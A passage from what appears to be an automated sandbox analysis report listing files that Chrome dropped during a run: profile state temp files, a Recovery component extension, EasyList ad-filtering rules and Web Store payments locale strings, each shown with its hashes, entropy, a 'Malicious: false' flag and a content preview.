6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Google\Chrome\User Data\f11e4174-598a-40e4-b559-02beed15faec.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	207994
Entropy (8bit):	6.072256637605032
Encrypted:	false
SSDEEP:	6144:FU03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:FnCW8D2FmvoL
MD5:	801FC8D6CC0A7EBD956E86300E250E47
SHA1:	BEEB2ADDEAEAA305ED93C096AF63DA047EB9E7AA
SHA-256:	A61923AC1B2536A7B194903506F5457A6831D472A605BCB833653D6BF390D63D
SHA-512:	0D535722BD551A045BBFBD81CC96DF3F0252B9E2DD1ACB7BF1AC1C41072A892DB3D0E1D6294C7FFAC6B555716946110FD09740CCB2F51D8D10D6067E0998862F
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245922715401452"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Google\Chrome\User Data\f2e5f5ea-4b77-4abe-a4fb-c000703053ef.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	199553
Entropy (8bit):	6.044287905636466
Encrypted:	false
SSDEEP:	6144:n03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:0CW8D2FmvoL
MD5:	2BEFEAD84AFABFAFFEFD89DDE1868438
SHA1:	38943C0029546993EE5D68E29AAA31EDBD191596
SHA-256:	00921474ABA2E1E15398462507CE765024331A1FDE159992A25670F188BBC7F9
SHA-512:	314A49169ECAFDCBEF4BD930B430BCB918A9DD91A24708A3ABE052264C4D0EDD11E23D5E7CC7B427719F3FA9A845E41063304BE5DCEF4B84B419D05BA14DA400
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Temp\229f6fa7-84c3-4f31-aa76-91ac60469b60.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	248531
Entropy (8bit):	7.963657412635355
Encrypted:	false
SSDEEP:	3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
MD5:	541F52E24FE1EF9F8E12377A6CCAE0C0
SHA1:	189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
SHA-256:	81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
SHA-512:	D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
Malicious:	false
Preview:	Cr24..............0.."0....H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L\|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.\|1..n.<Fb..f..Q1.....s..2..{.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f\|.~.c.4.E.......0..0....H............0.......).'..b.$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.\|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$\|..\|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...\|!..A..L.+.=...kP.!.1..

C:\Users\user\AppData\Local\Temp\5208_26784880\Recovery.crx3

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	145035
Entropy (8bit):	7.995615725071868
Encrypted:	true
SSDEEP:	3072:TdgEhmDf+E8VY0x81Rkc6L2oqzqkPEu30gZlc3G2ZknF:TyEhmDf+/+Fnkj6lEukgZyyF
MD5:	EA1C1FFD3EA54D1FB117BFDBB3569C60
SHA1:	10958B0F690AE8F5240E1528B1CCFFFF28A33272
SHA-256:	7C3A6A7D16AC44C3200F572A764BCE7D8FA84B9572DD028B15C59BDCCBC0A77D
SHA-512:	6C30728CAC9EAC53F0B27B7DBE2222DA83225C3B63617D6B271A6CFEDF18E8F0A8DFFA1053E1CBC4C5E16625F4BBC0D03AA306A946C9D72FAA4CEB779F8FFCAF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L\|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.\|1..n.<Fb..f..Q1.....s..2..{.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-eu...b..........S'.....2.{.....'....+.'.."..Y.x.ISa...)....H.&92..?!..~..F.5."...n,.B.-\|\.)..(..... ]G..j.-M)....C......o&L..0.K.....UtP.&.N...;..^w/a{)v...~KG;...?.1...k.c..D.U......J.6.`.G.5.x.k..[...i.A.@I^..I.<A. J...j.'.G.`.$q.N..Tdq]2]p.OF..#.#......'....8.3......0.."0....H.............0.............O..(...':19..O/.>....=.....m.n\.z..q.....JW..F......+H.Z+KGO.9....8.....U...&.y....,$...?.Eo.....\f/.Z..+M8...B.3'..Y.r...X.AS?.~..k..n....... Z...&.G....."n..........l.0v.x#<....Lx,-.w..-..d.....J.pT..('e~{%kQ.Q......rI.....Z....v.N.....J.d_......rX.......w@.b.[.c../V.'c...!.~.k..}z...U.S..nC......@.......Y..#.D.z.....5&.1O...X=p..2.F..P.6yP..>{.....HBX.*.E5....y..

C:\Users\user\AppData\Local\Temp\5208_26784880\_metadata\verified_contents.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1765
Entropy (8bit):	6.027545161275716
Encrypted:	false
SSDEEP:	48:p/hii6zkvVI1Jip2qRNHvakuQkCNFxdsGwmBKkgum91:Rz0kv6cNvaYNFwSEhug
MD5:	45821E6EB1AEC30435949B553DB67807
SHA1:	B3CADEB17FE5B76B5DBB428B8D3A07B341F8B1BC
SHA-256:	E5FAE91295BECF7F66BFA4BE1061CA5537ED763EB5D01485F23ECFB583304FEE
SHA-512:	BCBE40CAFAA4B14566D91E361D8FB7F0288D5C459FA478AA4C575444DA4D406E1076FC0B3A31D4A9E5EE034F0FE15A0EFE8A8A52B838DE94B96D3E488D28F0FE
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJSZWNvdmVyeS5jcngzIiwicm9vdF9oYXNoIjoiaGdCR051SzhNR2NKaDlfNmZQaFdEWmpVYUFKeklzeDlJS21DUEZvb0dfUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiIwYXduVFBFQmdDRHkyV05hVVk3Um9mSWN3c3ZwNHFRNUxzZVMxVXRiVXY0In1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoiaWhubGNlbm9jZWhnZGFlZ2RtaGJpZGpobmhkY2hmbW0iLCJpdGVtX3ZlcnNpb24iOiIxLjMuMzYuMTQxIiwicHJvdG9jb2xfdmVyc2lvbiI6MX0","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"iFuMX_kOZ-zJ7KVu6Lxb3rHWZgQvkZhv25x_SGlBiDV_okALrGbj6rUOWyNNNsHXMnT118XZmA696XR8qkr4dwT5Gvez-9gi-WYBY7XBkgo7v6NspGgJF89BNCeI-P9k-zBHOGgrf-fCEiAcoM7xCx9_f8qlRy7nhQPyjOIHn5eEJEir0uSu6gdqR9afnVZ3UoR-VOLdOBt7fA4ee38MP2ut5qWU50F5dvIezfKkTVDMHwztvcLCy6R9SVkdSYv6jwWGccYRl-aclvkkHu6SnbZGI7fmDZdkcBAxBHYEZZMmvb76ro4SO15GDyEVAo_Qf4trdrY_GyN_Bm73imCTjgtoGc

C:\Users\user\AppData\Local\Temp\5208_26784880\manifest.fingerprint

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.7900469623255675
Encrypted:	false
SSDEEP:	3:SpOXzxlQ4BdPWfDL9c:SpOjDQFfVc
MD5:	2AE14F91312C4E8034366B09D49D5B18
SHA1:	AD4933A5D838D0FA0B960C327A5039A9E8249642
SHA-256:	4F122332EF0F2BB490EF59619D3602C1A7277C0A7A19C132202DB4803A09BFA2
SHA-512:	FB0CC467A4B8463F6A3BF42CDC11C23B34EB94A9397644B68714DCB819EE326BAE05022D59D23DC9907DF1E6928064D853FD0900BB6083417892D4D5A9BA7716
Malicious:	false
Preview:	1.aeedb246d19256a956fedaa89fb62423ae5bd8855a2a1f3189161cf045645a19

C:\Users\user\AppData\Local\Temp\5208_26784880\manifest.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	195
Entropy (8bit):	4.682333395896383
Encrypted:	false
SSDEEP:	3:rR6TAulhFphifFJ9LAG9Xg0XTFHqS1wP/pEeSWU4pv/8F/FxLj2RF2fcTZTotL:F6VlM90ggITgS1wnuWfB0NpK4aotL
MD5:	7A8E3A0B6417948DF4D49F3915428D7A
SHA1:	4FC084AABDB13483567D5C417C7ED8FD16726A80
SHA-256:	D1AC274CF1018020F2D9635A518ED1A1F21CC2CBE9E2A4392EC792D54B5B52FE
SHA-512:	064D84A57B28C19AD10742859DA493D0826B47ADC632F6C623DFB4DE36D72A9D29BE98518061A9FFD42D99FCF01F27DE39CE74782B3A5ACBBE11DFDDEEAB59A1
Malicious:	false
Preview:	{. "manifest_version": 2,. "name": "ImprovedRecoveryComponentInner",. "version": "1.3.36.141",. "imageName": "image.squash",. "squash": true,. "fsType": "squashfs",. "isRemovable": false.}

C:\Users\user\AppData\Local\Temp\5208_646319911\Filtering Rules

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	97968
Entropy (8bit):	5.489893397464442
Encrypted:	false
SSDEEP:	1536:ojHlFMJw9iI9Yh9FHc6cPC3CpBHTrDo630a8Q78xRAQudDv4NZ/p2GuN+BO1:6FMJw9v9efHc6cPCURDR30EYnAQuJANw
MD5:	3846A25BC9191585763E06550798BAB1
SHA1:	F43D903B13AB969E2276E304795CE164F22F893C
SHA-256:	C7D5D133E8F995D3E4D5B68F28BE0D7B1F290DFBD1502E0EC260142325FA8F88
SHA-512:	6B1E1776DE4B4B7D7BD7E6252F555AD84CC689EFE1F3920B3ACFE23DE65212254FC219E0A530037A5EA819894BC2F5B85ECFC0ADDEE9AF3163393AA32F97BA44
Malicious:	false
Preview:	............0.8.@.R.-728x90...........0.8.@.R.adtdp.com^..........0.8.@.R.yomeno.xyz^.:...........adcore.com.au.....adcore.ch..0.8.@.R./adcore_..........0.8.@.R.uwoaptee.com^.8.........safeway.com0.8.@.R.fwcdn2.com/js/embed-feed.js..........0.8.@.R._468_60..3........0.8.@.R#/wp-content/plugins/wp-super-popup/.9........0.8.@.R)bancodevenezuela.com/imagenes/publicidad/..........0.8.@.R..adbutler-..........0.8.@.R.adrecover.com^..........0.8.@.R.hdbcode.com^.?...........google.com0.8.@.R!developers.google.com/google-ads/.-...........konograma.com..0.8.@.R./adserver..............vk.com0.8.@.R.vk.me/css/al/ads.css.,........0.8.@.R.mysmth.net/nForum//ADAgent_..........0.8.@.R.indoleads.com^.%......0.8.@.R.discordapp.com/banners/.E...........daum.net0.8.@.R)daumcdn.net/adfit/static/ad-native.min.js.(........0.8.@.R.looker.com/api/internal/.#........0.8.@.R.broadstreetads.com^..........0.8.@.R./banner.cgi?..............thefreedictionary.com...downloads.codefi.re*...windows7themes.net

C:\Users\user\AppData\Local\Temp\5208_646319911\LICENSE.txt

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24623
Entropy (8bit):	4.588307081140814
Encrypted:	false
SSDEEP:	384:mva5sf5dXrCN7tnBxpxkepTqzazijFgZk231Py9zD6WApYbm0:mvagXreRnTqzazWgj0v6XqD
MD5:	D33AAA5246E1CE0A94FA15BA0C407AE2
SHA1:	11D197ACB61361657D638154A9416DC3249EC9FB
SHA-256:	1D4FF95CE9C6E21FE4A4FF3B41E7A0DF88638DD449D909A7B46974D3DFAB7311
SHA-512:	98B1B12FF0991FD7A5612141F83F69B86BC5A89DD62FC472EE5971817B7BBB612A034C746C2D81AE58FDF6873129256A89AA8BB7456022246DC4515BAAE2454B
Malicious:	false
Preview:	EasyList Repository Licences.... Unless otherwise noted, the contents of the EasyList repository.. (https://github.com/easylist) is dual licensed under the GNU General.. Public License version 3 of the License, or (at your option) any later.. version, and Creative Commons Attribution-ShareAlike 3.0 Unported, or.. (at your option) any later version. You may use and/or modify the files.. as permitted by either licence; if required, "The EasyList authors.. (https://easylist.to/)" should be attributed as the source of the.. material. All relevant licence files are included in the repository..... Please be aware that files hosted externally and referenced in the.. repository, including but not limited to subscriptions other than.. EasyList, EasyPrivacy, EasyList Germany and EasyList Italy, may be.. available under other conditions; permission must be granted by the.. respective copyright holders to authorise the use of their material.......Creative Commons Attribut

C:\Users\user\AppData\Local\Temp\5208_646319911\_metadata\verified_contents.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1529
Entropy (8bit):	5.993915630498445
Encrypted:	false
SSDEEP:	24:pZRj/flTHYfcl5kYbKqLjeT3azkaoX1pF/kSYYRVHbo0doXxOB6G6QL3foQ3QL5D:p/h4ElBbKdTakak1pFcSfRV7o0dkx8L4
MD5:	6B2EDD2D0C16E5D77BD2C3E4AE88C95F
SHA1:	BC82982FA8A04FA6FD9F17DA03D443A57E0F78D4
SHA-256:	CA0F5F75FC56FBEDA7522B2C83707A451D01760F417C497A37C70554E290B737
SHA-512:	533026A33030795ABF24B6E78D26763734D98CA74BFA4FAC2073EFAD0BB5CA1C38E7036BEAF17E6ABBFE56CF968E80EB3CA3CFD23AEEC10CE1280E8DB1C4078C
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJGaWx0ZXJpbmcgUnVsZXMiLCJyb290X2hhc2giOiJMTF90X0NkWWRYUnpMSHJBZ3hmUW5tcENTaXlkWEtzVVlJZnZjLTR0czRBIn0seyJwYXRoIjoiTElDRU5TRS50eHQiLCJyb290X2hhc2giOiIyaWswNmk0TFlCdVNHNWphRGFIS253NE9pdnVSRzZsQ0JKMVk0TGtzRFJJIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6Imo4MmhRZGhaa0MwMjFWOEZ1MHUtMExvMnVJdXI5SzdFem5JcHE3WHd2YlkifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJnY21qa21nZGxnbmtrY29jbW9laW1pbmFpam1tam5paSIsIml0ZW1fdmVyc2lvbiI6IjkuMzYuMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"VM_rIA1uXuXjbhz_uZ8uQp9F3FfgEgGTjCXL08Q_jrGXXH-Yty1DqAw4yzWsadeOjVRozUf_7kBrYJ2U8Y8slircdLRbrqJejQeyyrJx4HFT8qgZEb60YHdsOd76C57YzF5dXErpjT7_FkWA41lTxLQvdWbACMO0DE7uOHO9mZx5pM98Ni9GsM_yxJbRSyDZWa8BdPHErfMuO6YE6D8tbnYTr2tXcMV9p2ZEAFMiso2B-6DSr

C:\Users\user\AppData\Local\Temp\5208_646319911\manifest.fingerprint

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.9458563396006063
Encrypted:	false
SSDEEP:	3:SWllBTGVn1VJ8U1hRGGpWdTdSATn:SWNT+eKhRR4dTVT
MD5:	991F44CE02222E783A1FEFE4187727CE
SHA1:	9855D1CA0338ADCD5829C3260BF7FAAF88A23509
SHA-256:	58704ADE087671AA1226BC9CEC1719F5B80B90C571EF747812A64458BBEA0F50
SHA-512:	C2616426939B235620A22B24A9BEC6D4F7DBB695C812F1784A4C95B41E53A21F371A6C440177CFABDE47E203EB83269F9013FC75C6D758EA6FDFE7B52B4A554E
Malicious:	false
Preview:	1.34ff2e9d7a7ce81c5d760d4b0f4b59a0237dd5db0d1e84ccd5103a30687eac17

C:\Users\user\AppData\Local\Temp\5208_646319911\manifest.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	115
Entropy (8bit):	4.563301657145084
Encrypted:	false
SSDEEP:	3:rR6TAulhFphifFHXG7LGMdv5HcDKhtUJKS1Avn:F6VlMZWuMt5SKPS1Avn
MD5:	47B89067C397B3EABBD04E6FC4008B71
SHA1:	7B4E623806D7EA8BFCD2FE6836A21E50C9F9340E
SHA-256:	8FCDA141D859902D36D55F05BB4BBED0BA36B88BABF4AEC4CE7229ABB5F0BDB6
SHA-512:	FDA1CE8EB24A05F65E8132248EEF96C422E5AA2D3254B590FBFD3FCB2016E3B7F6E4B53702D88E1695D4BEC0175F72EB4256CDAA2FF72DDF4390D480D04BA373
Malicious:	false
Preview:	{. "manifest_version": 2,. "name": "Subresource Filtering Rules",. "ruleset_format": 1,. "version": "9.36.0".}.

C:\Users\user\AppData\Local\Temp\6b74ac1a-eb2d-45dd-9ac1-64a7b726e330.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\229f6fa7-84c3-4f31-aa76-91ac60469b60.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	248531
Entropy (8bit):	7.963657412635355
Encrypted:	false
SSDEEP:	3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
MD5:	541F52E24FE1EF9F8E12377A6CCAE0C0
SHA1:	189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
SHA-256:	81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
SHA-512:	D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
Malicious:	false
Preview:	Cr24..............0.."0....H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L\|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.\|1..n.<Fb..f..Q1.....s..2..{.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f\|.~.c.4.E.......0..0....H............0.......).'..b.$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.\|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$\|..\|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...\|!..A..L.+.=...kP.!.1..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	796
Entropy (8bit):	4.864931792423268
Encrypted:	false
SSDEEP:	12:1HEJMLkSlwZGGMLkSlwZ+WYpU34f145Gb+dgoxTyO8ZpU34f1L0frhmJ03OyZnLt:1HE7n4gn8WYpYrbhz8ZpotHOGAOf6aD
MD5:	6F8E288A9AD5B1ED8633B430E2B4D4CA
SHA1:	F671D3D4BEFA431D1946D706F4192D44E29B6F08
SHA-256:	A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
SHA-512:	0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
Malicious:	false
Preview:	{.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	675
Entropy (8bit):	4.536753193530313
Encrypted:	false
SSDEEP:	12:1HEJ0gbbGG0gbb+WYpU34g3YbiLO+dgyGFoO8ZpU34+puiPmb03OyZnLAOfTYABk:1HE5baib6WYpm31Lt0Z8Zp8pxOGAOfKD
MD5:	1FDAFC926391BD580B655FBAF46ED260
SHA1:	C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
SHA-256:	C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
SHA-512:	39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	641
Entropy (8bit):	4.698608127109193
Encrypted:	false
SSDEEP:	12:1HEJfZGGfZ+WYpU34OBh+dgN/O8ZpU34j05U03OyZnLAOfTYWc:1HEl4G8WYpdt8Zpq5TOGAOfW
MD5:	76DEC64ED1556180B452A13C83171883
SHA1:	CFB1E56FD587BCDC459C1D9A683B71F9849058F9
SHA-256:	32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
SHA-512:	5230A217968D5DC463E2E92D704544311A721E5CEF65C3125CBD8DEB9C0293D3BFB5C820A6011ABF77095FDEE7DAF67D541DC202B0C9CDB0908CBB85D84885CB
Malicious:	false
Preview:	{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	624
Entropy (8bit):	4.5289746475384565
Encrypted:	false
SSDEEP:	12:1HEJJMKKFZGGJMKKFZ+WYpU34OHu+dgxlCZO8ZpU34J4Wu03OyZnLAOfTYzD:1HErMKfqMKVWYpM6lL8ZpDNOGAOfiD
MD5:	238B97A36E411E42FF37CEFAF2927ED1
SHA1:	4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0
SHA-256:	4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
SHA-512:	FD0742D47B5F5AB9AAD9B4C3D57F63CB693E060EECE123A72036C6E92156D099495C7E9E9CC6DC83EEBCDDCC4B4C81FB47E4C9559DA3EBA024780FFF10C53E0A
Malicious:	false
